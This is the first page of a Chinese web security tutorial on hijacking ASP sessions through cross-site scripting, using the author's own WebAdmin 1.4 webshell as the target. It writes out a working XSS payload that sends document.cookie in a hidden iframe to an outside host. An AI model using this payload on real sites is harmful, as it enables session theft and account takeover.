跨站实现HTTP会话劫持(图)

Web应用程序是通过2种方式来判断和跟踪不同用户的：Cookie或者Session（也叫做会话型Cookie）。其中Cookie是存储在本地计算机上的，过期时间很长，所以针对Cookie的攻击手段一般是盗取用户Cookie然后伪造Cookie冒充该用户；而Session由于其存在于服务端，随着会话的注销而失效（很快过期），往往难于利用。所以一般来说Session认证较之Cookie认证安全。

当然啦，Session难于利用并不等于不能利用，本文将通过一个小小的例子实现一次简单的HTTP会话劫持。

还是以ASP为例，ASP程序是如何得到客户端Session的呢？通过抓包可以发现HTTP请求的Cookie字段有个ASPSESSIONIDXXXXXXXX（X是随机的字母）值，ASP程序就是通过这个值判断Session的。如果我们得到管理员的ASPSESSIONIDXXXXXXXX及其值，并在这次会话结束之前提交到服务器，那么我们的身份就是管理员啦！

那怎么得到Session呢？答案是跨站。因为JavaScript的document.cookie()方法会把Cookie读出来，当然也包括会话型Cookie。

如果你关注Web安全，相信你一定看到过记录跨站得到Cookie的脚本程序，我们也需要一个类似的程序，但功能不是记录，而是立即转发（因为当前会话随时可能由于管理员退出而失效）。这个程序可以用ASP、PHP、Perl甚至C来实现，我还是用ASP吧, 要写这个程序，你还必须对要攻击的程序相当了解，因为你要提交各种请求。那现在先看看本例中被跨站的程序吧。

很荣幸，我选中了WebAdmin 1.4，嘿嘿，自己写的程序自己肯定最清楚哪里有漏洞啊。呵呵，简要介绍一下，WebAdmin是一个ASP.Net下的webshell，使用的Session认证方式，1.4版本的跨站存在于目录浏览的URL（图1）。

所以我就在src中构造这样的路径：“E:<script>a='<iframe width=0 height=0 src=http://www.0x54.org/test/cc.asp?a=';a%2B=escape(document.cookie);a%2B='></iframe>';document.write(a);</script>”。这段代码就是把当前cookie作为参数提交给www.0x54.org/test/cc.asp文件。

 

[1] [2] 下一页